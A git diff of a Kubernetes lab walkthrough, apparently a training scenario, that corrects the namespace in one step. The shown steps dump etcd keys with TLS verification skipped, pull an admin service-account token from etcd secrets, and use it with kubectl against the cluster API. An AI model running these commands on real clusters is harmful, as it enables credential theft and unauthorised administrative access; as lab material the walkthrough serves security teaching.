diff --git a/Scenario Walkthroughs/etcd.md b/Scenario Walkthroughs/etcd.md index feea617..00eef13 100644 --- a/Scenario Walkthroughs/etcd.md +++ b/Scenario Walkthroughs/etcd.md @@ -5,7 +5,7 @@ 3. First we need to dump some secrets out of the etcd database `etcdctl --insecure-skip-tls-verify --insecure-transport=false --endpoints=https://[CLUSTERIP]:2379 get / --prefix --keys-only | grep token` 4. Then we'll need a service account token to authenticate to the cluster with. Looking through the list of accounts we can see an admins-account - `etcdctl --insecure-skip-tls-verify --insecure-transport=false --endpoints=https://[IP]:2379 get /registry/secrets/kube-system/admins-account-token-[RAND]` + `etcdctl --insecure-skip-tls-verify --insecure-transport=false --endpoints=https://[IP]:2379 get /registry/secrets/default/admins-account-token-[RAND]` The service account token starts with ey and ends just before the word `kubernetes.io` in the token. 5. With the service token we can use kubectl , first get the API pod name `kubectl --insecure-skip-tls-verify -shttps://[IP]:6443/ --token="[TOKEN]" -n kube-system get po`